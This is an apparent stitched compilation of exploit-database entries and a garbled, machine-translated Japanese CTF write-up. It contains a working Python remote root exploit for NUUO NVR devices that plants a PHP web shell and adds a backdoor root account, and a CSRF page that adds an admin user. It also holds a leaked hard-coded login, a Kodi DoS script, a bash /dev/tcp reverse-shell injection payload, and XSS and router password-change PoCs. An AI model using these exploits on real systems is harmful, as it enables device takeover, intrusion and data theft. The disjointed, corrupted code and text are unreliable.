settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes full equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.
Desc: NUUO NVRmini, NVRmini2, Crystal and NVRSolo suffers from a file disclosure
vulnerability when input passed thru the 'css' parameter to 'css_parser.php' script
is not properly verified before being used to include files. This can be exploited
to disclose contents of files from local resources.
Tested on: GNU/Linux 3.0.8 (armv7l)
GNU/Linux 2.6.31.8 (armv5tel)
lighttpd/1.4.28
PHP/5.5.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5350
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5350.php
14.01.2016
--
Request:
--------
GET http://10.0.0.17/css_parser.php?css=__nvr_dat_tool___.php HTTP/1.1
Response:
---------
<?php
include('utils.php');
header("Expires: Thu, 19 Nov 1981 08:52:00 GMT");
header("Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0");
header("Pragma: no-cache");
session_start();
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>DatTool</title>
</head>
<body>
<?php
if (isset($_POST) && isset($_POST['username']) && isset($_POST['password']))
{
if ($_POST['username'] != 'nuuoeng' || $_POST['password'] != 'qwe23622260')
{
exit(0);
}
if (isset($_POST['act']) && $_POST['act'] == 'checkdat')
{
echo '<script language="javascript">';
echo 'alert("The system will start to repair videos right after system reboot. Please go to Setting Page to reboot system manually.")';
echo '</script>';
touch(constant("FLASH_FOLDER")."/checkdat");
}
?>
<p>Click the Repair button to repair the recorded videos became black due to incorrect video format. It may take a long time to repair videos, which depends on the amount of video files.</p>
<form method="POST" action="<?php echo $_SERVER['PHP_SELF']; ?>" name="form0">
<input type="hidden" name="username" value="<?php echo $_POST['username']; ?>">
<input type="hidden" name="password" value="<?php echo htmlspecialchars( $_POST['password'] ); ?>">
<input type="hidden" name="act" value="checkdat">
<input type="submit" value="Repair" name="submit" >
</form>
<?php
}
else
{
?>
<form method="POST" action="<?php echo $_SERVER['PHP_SELF']; ?>" name="form0">
Usermame: <input type="text" size="15" name="username" value=""><br />
Password: <input type="password" size="15" name="password" value=""><br />
<input type="submit" value="Submit" name="submit" >
</form>
<?php
}
?>
</body>
</html>
============================================================================
Request:
--------
GET http://10.0.0.17/css_parser.php?css=css_parser.php HTTP/1.1
Response:
---------
<?php
if(!isset($_GET['css']))exit('/* please supply a "css" parameter */');
$filename=$_GET['css'];
if(strpos($filename,'..')!==false)exit('/* please use an absolute address for your css */');
$filename=$_SERVER['DOCUMENT_ROOT'].'/'.$filename;
if(!file_exists($filename))exit('/* referred css file does not exist */');
header('content-type:text/css');
header("Expires: ".gmdate("D, d M Y H:i:s", (time()+900)) . " GMT");
$matches=array();
$names=array();
$values=array();
$file=file_get_contents($filename);
foreach ($_GET as $key=>$value)
{
//echo "Key: $key; Value: $value <br/>\n ";
if ($key != 'css')
{
$file = str_replace($key,$value,$file);
}
//system("echo \"Key: $key; Value: $value <br/>\n \" >> $filename");
}
echo $file;
/*
foreach(array_reverse($matches[0]) as $match){
$match=preg_replace('/\s+/',' ',rtrim(ltrim($match)));
$names[]=preg_replace('/\s.*//*','',$match);
$values[]=preg_replace('/^[^\s]*\s/','',$match);
}
*/
?>
crypto
vigenere
https://www.boxentriq.com/code-braking/vigenere-cipher webサイトでのブラストは、key:asterismを取得します
ファルグを取得するための復号化。
または
Vigenereというタイトルによると、バージニアのパスワードであることがわかります
オンラインデコードツールでのクラッキング
https://guballa.de/vigenere-solver
フラグ:フラグ{53D613FC-6C5C-4DD6-B3CE-8BC867C6F648}
pwn
supercall
シンプルなスタックオーバーフロー、libcsearcherを使用して、質問からリークされた_io_2_1_stdin_の実際のアドレスを介してlibcベースアドレスを見つけ、one_gatgetを使用してシェルを取得します。
#!/usr/bin/env python# - * - encoding: utf-8-* - '' '@file : exp.p.p.p.p.p.p.p.p.p.p.p.p.p.13:3933:07@著者: lexsd6' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' '' *local_mote=0elf='。/supercall'e=elf(elf)#context.log_level=' debug'context.arch=e.archip_port=['123.57.207.81'、16985] debug=lambda : gdb.attach(p)if local_mote===1 3360 P=Process(ELF)else : p=remote(ip_port [0]、ip_port [-1])#0x000000000000026796 : pop rdi; retstack_addr=int(p.recvuntil( '、')[:-1]、16)stdin_addr=int(p.recv()、16)log.info(hex(stack_addr))log.info(hex(stdin_addr))x=finder( '_ io_2_2_1_stdin_' ' 9: Local-46E93283FF531:E02A73AE5B5BA375410855(ソースfrom:/mnt/d/filewsl/supercall/libc-2.27.so)p.sendline( '1'*8+'2'*8+'3'*7)p.sendline( '\ x00'*0x10+'x'*8+p64(x.gg(num=0)) execve( '/bin/sh'、rsp+0x40、環境)制約: rsp0xf==0 rcx==null '' 'p.interactive()
その後、遠隔猫の旗で。
[+] Gadget:0x4f3d5 [*]インラートモードへの切り替え$ lsbindevflagliblib32lib64supercall $ cat f*flag {2f3f3f3632-6484-4c00-82f3-a63e0d4340d9} $
resnake
質問にはUPXシェルがあることがわかりました。無セリングの後、私はそれをIDAで開いてレビューし、暗号化されたフラグ機能が疑われることがわかりました。
int sub_40186f(){char v1 [256]; //[ESP+18H] [EBP-910H] char dst [2048]; //[ESP+118H] [EBP-810H] int j; //[ESP+918H] [EBP-10H] int i; //[esp+91ch] [ebp-ch] sub_4021ad(22、18); scanf( '%s'、v1); for(i=0; v1 [i]; ++ i); sub_4017d2(v1、i); #fun2 memset(dst、0、0x800u); sub_4015f7(v1、dst、i); #fun1 sub_4021ad(22、20); for(j=0; dst [j]; ++ j){if(dst [j]!=a7g5d5baytmdlwl [j])return puts( '正しく〜もう一度来てください〜'); } return puts(asc_405016);}
fun2のフォローアップを続けてください。
int __cdecl sub_4017d2(int a1、int a2){int result; //eax int j; //[esp+8h] [ebp-ch] int i; //[esp +ch] [ebp-8h] for(i=1; i=10; ++ i){for(j=0; ++ j){result=*(unsigned __int8 *)(j +a1); if(!(_ byte)result)break; if(a2%i) *(_ byte *)(j + a1) ^=(_byte)i +(_byte)j; else *(_ byte *)(j + a1) ^=(unsigned __int8)(j%i) +(_byte)j; }} return result;}
入力文字列を使用することであり、各文字は位置に従って動作します。
Fun1は、文字列のbase64暗号化です。
while(v16 a3){v3=v13; V14=V13 + 1; *(_ byte *)(a2 + v3)=str [((signed int) *(unsigned __int8 *)(v16 + a1)2)0x3f]; v11=16 *(_ byte *)(v16 + a1)0x30; if(v16 + 1=a3){v4=v14; V5=V14 + 1; *(_ byte *)(a2 + v4)=str [v11]; *(_ byte *)(v5 + a2)='='; V6=V5 + 1; V13=V5 + 2; *(_ byte *)(v6 + a2)='=';壊す; } v7=v14; V15=V14 + 1; *(_ byte *)(a2 + v7)=str [((signed int) *(unsigned __int8 *)(v16 + 1 + a1)4)0xf | v11]; v12=4 * *(_ byte *)(v16 + 1 + a1)0x3c; if(v16 + 2=a3){ *(_ byte *)(a2 + v15)=str [v12]; V8=V15 + 1; V13=V15 + 2; *(_ byte *)(v8 + a2)='=';壊す; } *(_ byte *)(a2 + v15)=str [((signed int) *(unsigned __int8 *)(v16 + 2 + a1)6)3 | v12]; V9=V15 + 1; V13=V15 + 2; *(_ byte *)(a2 + v9)=str [ *(_ byte *)(v16 + 2 + a1)0x3f]; V16 +=3;}
ただし、デバッグ中に、FUN1の前に、関数がグローバル変数STR値を変更することがわかりました。
この関数は次のとおりです。
署名int sub_401536(){char v0; //ST13_1署名int result; //EAX署名int v2; //[ESP+14H] [EBP-14H] int j; //[esp+18h] [ebp-10h] int i; //[esp+1ch] [ebp-ch] v2=strlen( 'abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz0123456789+/'); for(i=0; v2/2 i; ++ i){for(j=0; v2 -i -1 j; ++ j){if(str [j] str [j +1]){v0=str [j]; str [j]=str [j + 1]; str [j + 1]=v0; }}} result=1; DWORD_406060=1; return result;}
だから私は自分の願いを満たすためにスクリプトを書きました:
base_flag=[]#x='7G5D5BAY+TMDLWLU5CDKMTLCJNWKNUGB2AQL3CMPPVF6DAP72SCOSL b'x='abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz0123456789+/' v2=len( 'abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz0123456789 + /') '' ' v0=str [j]; str [j]=str [j + 1]; str [j + 1]=v0; }} '' '' for x: base_flag.append(ord(i))print(base_flag)for i in range(v2 //2): in range(v2-i-1): if base_flag [j] base_flag [j+1] 3360 v0=base_flag [j] base_flag [j] base_flag [j+1]=v0
本当のstrを入手してください:abcdefghijklmnopqrst0123456789+/uvwxyzabcdefghijklmnopqrstuvwxyz
fun1とfun2機能のソースをリバースコンピングする際に、フラグを取得します。
base64Table='abcdefghijklmnopqrst0123456789+/uvwxyzabcdefghijklmnopqrstuvwxyz'table2='abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz0123456789+/' tmp='7g5d5bay+tmdlwlu5cdkmtlcjnwknugb2akl3cpmppvftv'tlb '2coslb'tlb '2coslb'tlb '2coslb'tfmp2 '2coslb'tfmptv'tfmptv'tfmptv'tfmp2'slb'tfmptv'tfmptv'tfmptv'tfmptv'tfmptv'tfmptv'tfmptv'tfmptv'tfmptv'p In tmp:Index=table.index(i)tmp2 +=table2 [index] k=base64.b64decode(tmp2 +'==')nre='' kk=[] for i in ren(len(k)): kk.append(kk [i])print(kk)a2=len(kk)a2=len(kk)a2=len(kk)a2=len(kk)範囲(10)): i=i+1 for j in range(len(kk)): print(str(a2%i)+''+str(i))if a2%i!=0: kk [j]^=(i+j)els : kk [j]^=(j%i)+j)+j)プリント(kk) I in(kk): flag+=chr(i)print(flag)exit flag
フラグ{5E2200BC-F21A-5421-A90B-57DEC19FE196}
Misc
質問
フォームに記入した後、フラグがあります
フラグ{世界に安全感をもたらしましょう}
helloshark
写真
010それを開き、16進システムに多くのPK単語があることを発見しました。画像は分離されて処理されます(何よりも)。 Sure enough, the compressed package is hidden, but the compressed package sets a password, prompting the password in the picture 
guessing that the picture has LSB steganography, and use the tool zsteg for detection 
You can see that the password is @91902AF23C#276C2FC7EAC615739CC7C0 decompress the compressed package, and TCPフロー
を追跡するためにトラフィックパケットを開きます
フラグ
Get Flag:Flag {a4e0a418-fced-4b2d-9d76-fdc9053d69a1} 
を写真パスワード9527 
UNZIP、Open Excelファイル
は6か月で構成されています。左側と底部は1です。6か月のデータを最初にまとめ、列の高さと列の幅
Add A ConditionAtを統合するQRコードです。文字列に1が含まれると、背景は黒で満たされます。
Wechatはスキャンできません。スクリーンショットQRコード
DATAMATRIX QRコードオンラインデコードツールhttp://boy.co.ua/decode.php flag zfua {b3s1o9in1nw0halunofunc0hm1} caesarパスワード復号化
のような旗のような文字列を取得するフラグ{h3y1u9ot1tc0ngratulati0ns1}
FROM:https://LEXSD6.GITHUB.IO/2021/11/27/2021%E5%B9%B4%E6%98%A5%E7%A7%8B%E6%9D%AFE7%BD%91%E7%BBB%9C%E5%A E%89%E5%85%A8%E8%81%94%E8%B5%9B%E7%A7%8B%E5%AD%A3%E8%B5%9B%E5%8B%87%E8%80%85%E5%B1%B1%E5%B3%B0/#CHRYPTO
<!--
NUUO CSRF Add Admin Exploit
Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: <=3.0.8 (NE-4160, NT-4040)
Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes full equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.
Desc: The application interface allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests. This can be
exploited to perform certain actions with administrative privileges if a logged-in
user visits a malicious web site.
Tested on: GNU/Linux 3.0.8 (armv7l)
GNU/Linux 2.6.31.8 (armv5tel)
lighttpd/1.4.28
PHP/5.5.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5349
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5349.php
14.01.2016
-->
<!-- 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 -->
<html>
<body>
<form action="http://10.0.0.17/users_xml.php">
<input type="hidden" name="_password2" value="admin" />
<input type="hidden" name="addusername" value="csrfadmin" />
<input type="hidden" name="password" value="admin" />
<input type="hidden" name="cmd" value="adduser" />
<input type="hidden" name="group" value="poweruser" />
<input type="hidden" name="displaygroup" value="power user" />
<input type="hidden" name="magic" value="574" />
<input type="hidden" name="liveacc" value="1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16" />
<input type="hidden" name="pbacc" value="1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16" />
<input type="hidden" name="ptzacc" value="1" />
<input type="hidden" name="ioacc" value="1" />
<input type="hidden" name="backupacc" value="1" />
<input type="hidden" name="deleteacc" value="1" />
<input type="hidden" name="emapeacc" value="1" />
<input type="hidden" name="remotalkacc" value="1" />
<input type="hidden" name="logacc" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
#!/usr/bin/env python
#
#
# NUUO Remote Root Exploit
#
#
# Vendor: NUUO Inc.
# Product web page: http://www.nuuo.com
# Affected version: <=3.0.8
#
# Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
# functionality. Setup is simple and easy, with automatic port forwarding
# settings built in. NVRmini 2 supports POS integration, making this the perfect
# solution for small retail chain stores. NVRmini 2 also comes full equipped as
# a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
# and RAID functions for data protection. Choose NVR and know that your valuable video
# data is safe, always.
#
# Desc: NUUO NVRmini, NVRmini2, Crystal and NVRSolo suffers from an unauthenticated command
# injection vulnerability. Due to an undocumented and hidden debugging script, an attacker
# can inject and execute arbitrary code as the root user via the 'log' GET parameter in the
# '__debugging_center_utils___.php' script.
#
# -----------------------------------------------------
# $ nuuo.py 10.0.0.17 80
# [*] ==============================================
# [*] NUUO NVR/DVR/NDVR Remote Root Exploit
# [*] Zero Science Lab - http://www.zeroscience.mk
# [*] ==============================================
# [*] Backdoor detected!
# [*] Add root user (y/n)? n
# [*] Press [ ENTER ] to start root shell...
#
# root@nuuo:~# id
# uid=0(root) gid=0(root)
#
# root@nuuo:~# exit
#
# [*] Removing raidh.php file
# [*] Session terminated!
#
# $
# -----------------------------------------------------
#
# Tested on: GNU/Linux 3.0.8 (armv7l)
# GNU/Linux 2.6.31.8 (armv5tel)
# lighttpd/1.4.28
# PHP/5.5.3
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Zero Science Lab - http://www.zeroscience.mk
#
#
# Advisory ID: ZSL-2016-5348
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5348.php
# NSE Script: http://www.zeroscience.mk/codes/nuuo-backdoor.nse
# https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40209.zip
#
#
# 14.01.2016
#
import os######
import sys#####
import time####
import urllib##
import binascii
import requests
__author__ = 'lqwrm'
def persist(host,port,hexy,clean):
pwd = '''echo 'roOt:x:0:0:PWNED account:/:/bin/bash' >> /etc/passwd'''
sdw = '''echo 'roOt:$1$MJOnV/Y3$tDnMIBMy0lEQ2kDpfgTJP0:16914:0:99999:7:::' >> /etc/shadow'''
print '[*] Adding user \'roOt\' with password \'rewt\' in passwd file.'
requests.get('http://'+host+':'+port+'/raidh.php?cmd='+pwd)
time.sleep(2)
print '[*] Updating shadow file.'
requests.get('http://'+host+':'+port+'/raidh.php?cmd='+sdw)
time.sleep(2)
print '[*] Shell awaits: ssh roOt@'+host
requests.get('http://'+host+':'+port+'/raidh.php?cmd='+urllib.quote(clean))
exit(0)
def check(host,port,hexy):
try:
r = requests.get('http://'+host+':'+port+'/'+hexy, allow_redirects=False)
if r.status_code == 200:
print '[*] Backdoor detected!'
pass
else:
print '[*] No backdoors here. :('
exit(0)
except Exception:
print '[*] Could not connect.'
exit(0)
def main():
print '[*] =============================================='
print '[*] NUUO NVR/DVR/NDVR Remote Root Exploit'
print '[*] Zero Science Lab - http://www.zeroscience.mk'
print '[*] =============================================='
if (len(sys.argv) <= 2):
print '[*] Usage: nuuo.py <ipaddress> <port>'
exit(0)
host = sys.argv[1]
port = sys.argv[2]
dbgcu = '5f5f64'#
dbgcu+= '656275'#
dbgcu+= '676769'#
dbgcu+= '6e675f'#
dbgcu+= '63656e'#
dbgcu+= '746572'#
dbgcu+= '5f7574'#
dbgcu+= '696c73'#
dbgcu+= '5f5f5f'#
dbgcu+= '2e7068'#
dbgcu+= '70'###'#
hexy = binascii.unhexlify(dbgcu)
check (host,port,hexy)
payload = '''echo "<?php system(\$_REQUEST[\'cmd\']); ?>" > raidh.php'''
requests.get('http://'+host+':'+port+'/'+hexy+'?log=1337;' + payload)
clean = 'rm raidh.php'
a1 = raw_input('[*] Add root user (y/n)? ')
if a1.strip() == 'y' or a1.strip() == 'Y':
persist (host,port,hexy,clean)
else:
pass
print '[*] Press [ ENTER ] to start root shell...'
raw_input()
while True:
try:
cmd = raw_input('root@nuuo:~# ')
if cmd.strip() == '':
print '[*] Give me a command!\n'
continue
else:
e = requests.get('http://'+host+':'+port+'/raidh.php?cmd='+urllib.quote(cmd))
print e.text
if cmd.strip() == 'exit':
print '[*] Removing raidh.php file'
requests.get('http://'+host+':'+port+'/raidh.php?cmd='+urllib.quote(clean))
print '[*] Session terminated!'
break
except Exception:
break
if __name__ == "__main__":
main()
# Exploit Title: Kodi 16.1 Web Server Remote DoS
# Date: 06/08/2016
# Exploit Author: Guillaume Kaddouch
# Twitter: @gkweb76
# Blog: https://networkfilter.blogspot.com
# GitHub: https://github.com/gkweb76/exploits
# Vendor Homepage: https://kodi.tv/
# Software Link: http://mirrors.kodi.tv/releases/win32/kodi-16.1-Jarvis.exe
# Version: 16.1
# Tested on: Windows 7 Family x64 (FR)
# Category: DoS
"""
Disclosure Timeline:
--------------------
2016-08-02: Vulnerability discovered
2016-08-04: Vendor contacted
2016-08-04: Developper answered. Kodi v16 is End Of Life and will not be fixed.
2016-08-06: Exploit published.
Description :
-------------
A remote Denial Of Service exists in Kodi 16.1 (Jarvis) embedded web server when sending a specially crafted GET request.
The web server is disabled by default.
Instructions:
-------------
- Starts Kodi, and enable the web server in System, Services, Web server.
- Run this exploit locally or from your remote attacking machine.
"""
import socket
host = "192.168.135.129"
port = 8080
junk = '../' * 10
buffer = "GET " + junk + " HTTP/1.1\r\n"
buffer += "\r\n\r\n"
try:
print "[*] Connecting to %s:%d" % (host, port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "[*] Sending buffer... (%d bytes)" % len(buffer)
s.send(buffer)
s.close()
print "[*] Done."
except:
print "[-] Error connecting"
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Advisory ID: SYSS-2016-065
Product: NASdeluxe NDL-2400r
Vendor: Starline Computer GmbH
Affected Version(s): 2.01.10
Tested Version(s): 2.01.09
Vulnerability Type: OS Command Injection (CWE-78)
Risk Level: High
Solution Status: no fix (product has reached EOL since 3 years)
Vendor Notification: 2016-07-04
Public Disclosure: 2016-08-03
CVE Reference: Not assigned
Author of Advisory: Klaus Eisentraut, SySS GmbH, https://www.syss.de/advisories/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
The product "NASdeluxe NDL-2400r" [3] is vulnerable to OS Command Injection
as root. No credentials are required to exploit this vulnerability.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details / Proof-of-Concept:
The language parameter in the web interface login request of the product
"NASdeluxe NDL-2400r" is vulnerable to an OS Command Injection as root.
The SySS GmbH sent the following HTTPS request to the webinterface:
~~~~~
POST /usr/usrgetform.html?name=index HTTP/1.1
Host: 192.168.1.1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
lang=||`bash+-i+>%26+/dev/tcp/192.168.1.2/443+0>%261`&username=&pwd=&site=web_disk&login_btn=Einloggen
~~~~~
After sending the request, a reverse shell connected back:
~~~~~
# nc -lvvp 443
Listening on any address 443 (https)
Connection from 192.168.1.1:49070
bash: no job control in this shell
bash-3.00# whoami
root
bash-3.00# cat /img/version
2.01.09
~~~~~
The tested firmware version was 2.01.09. The most current version is
2.01.10 according to the web page of the vendor [3]. However there are
no hints of a security update in the release notes [4]. Thus, the SySS
GmbH assumes that this vulnerability is likely also present in the most
current firmware version from 2009-10-22.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Solution:
The product has reached end-of-life (EOL) status since more than three
years. Thus, no patch will be provided by the vendor.
It is highly recommended to migrate to one of the newer and still
supported NAS solutions which are (according to Starline Computer GmbH)
not affected by this vulnerability.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclosure Timeline:
2016-06-29: Vulnerability discovered
2016-07-04: asked info@starline.de for contact person (no answer)
2016-07-22: sent this advisory to info@starline.de
2016-07-22: response from vendor: won't fix (product reached EOL >3 years)
2016-08-03: public disclosure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
References:
[1] SySS GmbH, SYSS-2016-065
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-065.txt
[2] SySS GmbH, SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/
[3] NASdeluxe Homepage
https://www.nasdeluxe.com/
[4] NDL-2400R Firmware Release Notes
https://www.nasdeluxe.com/wp-content/uploads/2008/12/NDL-2400R_NDL-2500T_FWRN_v2_01_10.171.pdf
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Credits:
This security vulnerability was found by Klaus Eisentraut of the SySS
GmbH.
E-Mail: klaus.eisentraut@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Klaus_Eisentraut.asc
Key ID: 0xBAC677AE
Key Fingerprint: F5E8 E8E1 A414 4886 0A8B 0411 DAB0 4DB5 BAC6 77AE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclaimer:
The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright:
Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----
iQIcBAEBCgAGBQJXoddNAAoJENqwTbW6xneuMdwQANnc0LC5n+5Hz/jd/C4y6Vo/
V4rTM2ZeKHoinwaNe8wDqwLojVi370xkroe592skBuGaHsACpqVU/+i1uzez4Fd5
zv9FL0O16qeU4ATt0tlTMzBka+3l7+W46JjIt30auKXvb2C7HXlwru58HvMRoDUr
5ga48/C2tLAWeogR0hpflXg6xUmTTfZRL1zgEh4/etz8vA0DgwXl7fRQZq7z2fDF
L4oSrQ2oumS+IWH8qAUo/Tvd8al/OSQC+QfLjwxhpwb3n8nRrUaa2gYLuKvSXn3R
Sc8nuR+YuO4c+kXcUO2HQ2mpmSRKITOGOgqDwxiSHitTpGwkJiwh2PwRP45BJxTe
g99ivjeRUKkXlAkNZ3u38OYzSmPcf455fwGANFaBjljJtd5Z+Je9mqL2jnUvB1O1
ERFuyhDr1VKLiM4BQp3/hgqECHQRjiX7jUN0yHA3PWiM55wzHyftAti5K/XKSKTv
tFB19VoC+oJEA1i19uzv7xFscfiPHuRw0coGP2KSVwA2L3bIOLlMwWt/Ea/Qzcur
9JIUHX0+kKxJcLb6hthasQ4lIf2Jhjd4aFR+rPcJLL29r7HGOSoQLErXz2QmcePJ
1jKC6O2N2vrmrIZ+JOvWP99v0bIqC/857Xz5p30OUUjx2yLjpP/t5paidH1qlUMs
4mefqh41S76I3EZJpQn3
=V6E3
-----END PGP SIGNATURE-----
Stored Cross-Site Scripting vulnerability in Count per Day WordPress Plugin
Abstract
A Cross-Site Scripting vulnerability was found in the Count per Day WordPress Plugin. This issue can be exploited by an unauthenticated attacker and allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website/link.
Contact
For feedback or questions about this advisory mail us at sumofpwn at securify.nl
The Summer of Pwnage
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
OVE ID
OVE-20160717-0001
Tested versions
This issue was successfully tested on Count per Day WordPress Plugin version 3.5.4.
Fix
This issue is resolved in Count per Day version 3.5.5.
Introduction
The Count per Day WordPress Plugin shows reads and visitors per page, visitors today, yesterday, last week, last months and other statistics. A Cross-Site Scripting vulnerability was found in the Count per Day WordPress Plugin. This issue can be exploited by an unauthenticated attacker and allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website/link.
Details
When manipulating the referer header by putting in javascript: it will be rendered on the admin page within the referers list as a a href attribute. When admin (or above author level) clicks on it the XSS gets executed.
Tags get stripped so it's not possible to execute the XSS directly on load. Single and double quotes are escaped, but can be worked around. Example:
Referer: javascript:c=String.fromCharCode;alert(c(83)+c(117)+c(109)+c(79)+c(102)+c(80)+c(119)+c(110)+c(46)+c(110)+c(108))
The referer list shows the top 20. But its easy to get your attack referer in the top by just looping with unique x-forwarded-for ip's. By default referers are stored (but can be turned off in the settings of the plugin). Up to 150 chars of the referer are stored (can be changed to 500 max).
Proof of concept
GET / HTTP/1.1
Host: <target>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8,nl;q=0.6
x-forwarded-for: 1.1.1.5
Referer: javascript:c=String.fromCharCode;alert(c(83)+c(117)+c(109)+c(79)+c(102)+c(80)+c(119)+c(110)+c(46)+c(110)+c(108))
Connection: close
===================================================================
Title: Unauthenticated admin password change
Product: Davolink modem
Tested model: DV-2051
Vulnerability Type: Missing Function Level Access Control [CWE-306]
Risk Level: High
Solution Status: No fix available
Discovered and Provided: Eric Flokstra
===================================================================
[-] About the Product:
The Davolink DV-2051 is an ADSL modem with 4 Fast Ethernet ports,
Wireless Access Point and VoIP (2 times FXS).
[-] Advisory Details:
Basic authentication is in place to authenticate the administrative user
against the web application. To change the administrator password the
old password must be provided, which is validated by JavaScript. By
intercepting a successful password reset request the JavaScript
validation can be bypassed. It was also noticed authorisation checks are
missing on the password reset functionality. Combining these
vulnerabilities enable unauthenticated users to change the admin
password with a single request.
[-] Proof of Concept:
The following request can be used to change the admin password to the
value ’FooBar’:
192.168.1.1/password.cgi?usrPassword=FooBar
========================================================
Title: Lack of CSRF protection
Product: Davolink modem
Tested model: DV-2051
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
Risk Level: Medium
Solution Status: No fix available
Discovered and Provided: Eric Flokstra
========================================================
[-] About the Product:
The Davolink DV-2051 is a an ADSL modem with 4 Fast Ethernet ports,
Wireless Access Point and VoIP (2 times FXS).
[-] Advisory Details:
The web application enables users to set a password in order for clients
to connect to the SSID. Currently no measures against Cross-Site Request
Forgery have been implemented and therefore users can be tricked into
submitting requests without their knowledge or consent. From the
application's point of view these requests are legitimate requests from
the user and they will be processed as such. This can result in for
example changing the WPA2 password.
[-] Proof of Concept:
The following link can be used to trick a logged in user to set the WPA2
Pre Shared Key to ‘FooBar01’.
192.168.1.1/wlsecurity.wl?wlAuthMode=psk2&wlAuth=0&wlWpaPsk=FooBar01&wlWpaGtkRekey=0&wlNetReauth=36000&wlWep=disabled&wlWpa=tkip+aes&wlKeyBit=0&wlPreauth=0
===============================================================
Title: Multiple persistent Cross-Site Scripting vulnerabilities
Product: Davolink modem
Tested model: DV-2051
Vulnerability Type: Cross-Site Scripting [CWE-79]
Risk Level: Medium
Solution Status: No fix available
Discovered and Provided: Eric Flokstra
===============================================================
[-] About the Product:
The Davolink DV-2051 is a an ADSL modem with 4 Fast Ethernet ports,
Wireless Access Point and VoIP (2 times FXS).
[-] Advisory Details:
The web application enables users to add virtual servers to direct
incoming traffic from WAN side to an internal server with a private IP
address on the LAN side. It was noticed insufficient validation is
performed on several places such as the ‘srvName’ parameter which is
sent with the request when adding a new virtual server. This
vulnerability makes it possible to remotely execute arbitrary scripting
code in the target user's web browser by adding a persistent JavaScript
payload to the application.
[-] Proof of Concept:
The following request can be used as POC, it opens port 4444 to an
internal IP address. An iframe is added to the ‘srvName’ field and
displays a pop-up box.
